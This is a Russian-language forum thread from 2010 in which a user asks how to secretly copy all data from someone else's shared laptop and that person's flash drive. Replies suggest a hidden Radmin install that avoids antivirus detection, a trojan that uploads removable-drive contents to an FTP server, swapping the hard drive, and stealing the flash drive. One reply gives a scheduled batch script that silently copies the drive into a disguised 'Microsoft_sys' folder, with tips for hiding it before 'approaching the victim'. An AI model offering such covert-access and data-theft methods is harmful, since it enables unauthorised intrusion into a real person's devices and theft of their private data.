Компьютерный форум NoWa.cc Здесь может быть Ваша реклама
Правила Форума
редакция от 22.06.2020
Форум .::NoWa.cc::.
Вернуться   Компьютерный форум NoWa.cc > Компьютеры и Интернет > Скорая помощь

Уважаемые пользователи nowa.cc. Мы работаем для вас более 20 лет и сейчас вынуждены просить о финансовой помощи по оплате за сервер.
Окажите посильную поддержку, мы очень надеемся на вас. Реквизиты для переводов ниже.
Webmoney Webmoney WMZ: Z021474945171 Webmoney WME: E159284508897 Webmoney WMUSDT: T206853643180
Кошелёк для вашей помощи YooMoney 4100117770549562
YooMoney Спасибо за поддержку!

Ответ

Опции темы Опции просмотра Language
Старый 31.03.2010, 23:11   #16
CosmiC
Постоялец

По умолчанию Re: Слить все данные с компьютера

Цитата:
Сообщение от MR_Andrew Посмотреть сообщение
что еще надо сделать?

*нужно иметь машину в той-же сети, чтобы на нее скачивать.

Ответить с цитированием Вверх
Здесь может быть Ваша реклама
Здесь может быть Ваша реклама

Реклама: сериал мерзлая земля содержание серийМебельный магазин: ширма низкая - Переходи на сайт!заказать конфеты с доставкой краснодарщеточка для чистки брекетовпинтерест в телеграм

Старый 01.04.2010, 18:54   #17
MR_Andrew
Постоялец

Цитата:
Сообщение от CosmiC Посмотреть сообщение
*нужно иметь машину в той-же сети, чтобы на нее скачивать.

В той же сети, скорей всего, не получится.
MR_Andrew вне форума

Старый 01.04.2010, 19:35   #18
Sharer
Старожил

MR_Andrew, попробуйте исходить из того, что видео собьется, как мне кажется, в любом случае. Ну как минимум выйдет из полноэкранного режима просмотра, поэтому разок спалишься, но тут вопрос как этот разок использовать ;)

Я предлагаю рассмотреть еще варианты:

http://forum.script-coding.info/viewtopic.php?pid=8095
-быстренько запустить сервер radmin и отморозиться, если что..

-попробовать к ноуту подключиться через неиспользуемый сетевой интерфейс типа вайфай-блютус, но это стремно..

Старый 01.04.2010, 19:55   #19
MR_Andrew
Постоялец

Sharer, возможно будет возможность получить ПОЛНЫЙ доступ у ноуту, но на пару минут. Про удаленный сервер посмотрю, думаю, самое оно. За минуту успею? И как его непалевно установить, чтоб НИГДЕ не отображался, типо нету тут такого?
MR_Andrew вне форума

Старый 01.04.2010, 20:46   #20
Sharer
Старожил

MR_Andrew, по настройкам радмина - очень много инфы, можно настроить так, что он никак внешне себя не будет проявлять: если только в процессах повиснет, но это тоже народ побеждал.. Судя по тому, что тема не сегодня создана, то время есть все внимательно изучить и соотнести скорость и беспалевность настройки. Наверное остановитесь где-то по середине.

надо все покурить, также учесть, что он тупо может уже там стоять, поскольку многие администраторы им пользуются в организациях, также его кой-какие антивири могут определить как вирус, посему посмотреть что за антивирь на ноуте, потренироваться на своем компе... - поставить себе такой-же антивирь.. Поглядеть какие моменты в установке можно автоматизировать, чтобы настроить в два клика. И еще - потренироваться в быстром сносе этого дела после копирования, что сложнее: он повиснет резидентом и без перезагрузки просто так не даст себя удалить.

Настройки тут обсуждались - например
http://www.nowa.cc/showthread.php?t=...ghlight=RADMIN

Ну вобще поиском по форуму по фразе radmin поглядите - обсуждений много. Чем больше моментов вы продумаете и опробуете заранее, тем больше шансов сделать все успешно.

Эти 2 пользователя(ей) сказали cпасибо за это полезное сообщение:
Старый 07.04.2010, 18:09   #21
MR_Andrew
Постоялец

Еще добыл информацию.
На ноуте стоит Зверь, НОД и Аваст. Фаервола нету, проверил. Загнать можно все что угодно, сегодня как раз была такая возможность, но я не готов был....

В одной и той же сети никак не выйдет, это 100%.

Добавлено через 3 минуты
Sharer, хорошо, NET SHARE /? - как расшарить диски С и Д? И как подключаться и смотреть я так и не понял...

Добавлено через 23 минуты
RAdmin, походу, не прокатит. ИП узнать я точно не смогу, + большая вероятность, что там НАТ...

Последний раз редактировалось MR_Andrew; 07.04.2010 в 18:33.. Причина: Добавлено сообщение
MR_Andrew вне форума

Старый 08.04.2010, 10:52   #22
PAH
Неактивный пользователь

Хы, "ломаешь" систему чтобы ноут унесли к системщику и там все проворачиваешь за пиво
PAH вне форума

Старый 08.04.2010, 15:22   #23
sergejhomyak
Неактивный пользователь

Если там оч много инфы, то за 2-3 минуты стока инфы не слить, как те говорили нуно искать вариант сливания по сетке.
sergejhomyak вне форума

Старый 08.04.2010, 16:48   #24
MR_Andrew
Постоялец

Цитата:
Сообщение от sergejhomyak Посмотреть сообщение
Если там оч много инфы, то за 2-3 минуты стока инфы не слить, как те говорили нуно искать вариант сливания по сетке.

Я уже потерял все надежды... Ноут оказался не личный, а общий. И там всякого мусора, что мне не надо, навалом. А то, что надо, человек носит с собой на флешке...

С сеткой 100% отпадает, я никак не смогу узнать ИП, тем более, 99% он серый.
Последний вариант - только троян... Надо чтоб он просто копировал все со съемных дисков, которые к нему подключают и заливал на какой-то UA-IX ФТП, откуда уже я смогу достать.

Но опять же, ноут общий, это хлама оно сливать будет... Но пропробовать стоит. Надо, чтоб оно все с флешек заносило в временные или еще куда-то прятало, а потом, когда подключат к инету, автоматом начало закачку...

Добавлено через 2 минуты
Цитата:
Сообщение от PAH Посмотреть сообщение
Хы, "ломаешь" систему чтобы ноут унесли к системщику и там все проворачиваешь за пиво

Не катит...

Последний раз редактировалось MR_Andrew; 08.04.2010 в 16:51.. Причина: Добавлено сообщение
MR_Andrew вне форума

Старый 09.04.2010, 04:07   #25
PAH
Неактивный пользователь

Ну тогда находишь аналогичный ноут, устанавливаешь систему, все настройки как под этот, потом меняешь жесткий диск. За 2-3 минуты можно сделать.. правда если это будет смотреться нормально что ты с отверткой копаешься в ноуте ;)
PAH вне форума

Старый 09.04.2010, 15:34   #26
MR_Andrew
Постоялец

Цитата:
Сообщение от PAH Посмотреть сообщение
Ну тогда находишь аналогичный ноут, устанавливаешь систему, все настройки как под этот, потом меняешь жесткий диск. За 2-3 минуты можно сделать.. правда если это будет смотреться нормально что ты с отверткой копаешься в ноуте ;)

Цитата:
Ноут оказался не личный, а общий. И там всякого мусора, что мне не надо, навалом. А то, что надо, человек носит с собой на флешке...

Стырить флешку не предлагать....
MR_Andrew вне форума

Старый 09.04.2010, 17:30   #27
CosmiC
Постоялец

Цитата:
Сообщение от MR_Andrew Посмотреть сообщение
С сеткой 100% отпадает, я никак не смогу узнать ИП, тем более, 99% он серый.
Последний вариант - только троян... Надо чтоб он просто копировал все со съемных дисков, которые к нему подключают и заливал на какой-то UA-IX ФТП, откуда уже я смогу достать.

бесплатно пожалуй не найдешь такой специально заточенный троян.
тебе нужно обратиться к специалистам, которые специализируются на подобных вещах и зарабатывают на этом. не спрашивай где их искать, но кто ищет, тот найдет)
вот почему-то мне кажется, что "в открытую" в этой ветке форума тебе не смогут помочь. (как показал опрос, тут на НОВЕ тусуются в основном "продвинутые пользователи" не более)
советую копать в сторону программистов и писать им в личку...
хотя может в публичном доступе и есть нечто подобное, но специально я не искал... может кто из старожилов этого форума и в курсе таких штук

Старый 09.04.2010, 22:32   #28
Sharer
Старожил

CosmiC, имхо миф о "СПЕЦИАЛИСТАХ" сильно раздут.. Мне кажется никто специально заморачиваться не будет, тем более, что результат гарантировать при таком раскладе невозможно...

Незаметно слить с флехи данные на хард, потом потихоньку с харда передать по сетке..

Попробую пофантазировать и ограничиться простыми процедурами.. Например известно, что на флешке есть файл 123.txt, а флешка известно, что определяется, как диск X:
Тогда если вызывать в планировщике раз в пол часа командный файл примерно такого содержания

@if not exist x:\123.txt goto end
@if exist "c:\Program Files\Microsoft_sys" goto copy
@md "c:\Program Files\Microsoft_sys"
:copy
@copy X:\*.* "c:\Program Files\Microsoft_sys" >null
:end

есть шанс, что набор команд будет вызван тогда, когда вставлена флешка и начнет что-то копироваться..
Осталось озаботиться тем, чтобы
1. при вызове исполняемого файла не высвечивалось черное окно и вобще ничего не высвечивалось
2. чтобы копировалось все без подтверждения со стороны пользователя
3. чтобы копировались и директории тоже..
4. чтобы не перезаписывались уже скопированные файлы..

Далее, если подход сработает, то надо подумать, как начать копирование не в случае, если существует файл на диске, а вставлен сам диск. Потом ограничить, например по маске, копирование только нужных файлов. Возможно для того, чтобы скрыть исполнение команд прийдется переписать командный файл на каком-либо языке программирования.
Все это сначала опробовать дома и уже потом с готовым материалом подходить к жертве..

Последний раз редактировалось Sharer; 10.04.2010 в 02:03..
Sharer вне форума

Старый 09.04.2010, 22:37   #29
MR_Andrew
Постоялец

Sharer, огромное спасибо за пояснение!
Но, думаю, это уже сильно круто будет... Хотя вариант рассмотрю, буду думать. Возможно, полученный результат не будет соответствовать усилиям.

А с флешкой там подумал... Ее реально проще вытащить, сделать свое дело, а потом просто подкинуть куда-то, на видное место. Найдут ;)
MR_Andrew вне форума

Старый 06.05.2010, 23:43   #30
raalexx
Неактивный пользователь

2-3 минуты не хватит просто по скорости записи
raalexx вне форума

Ответ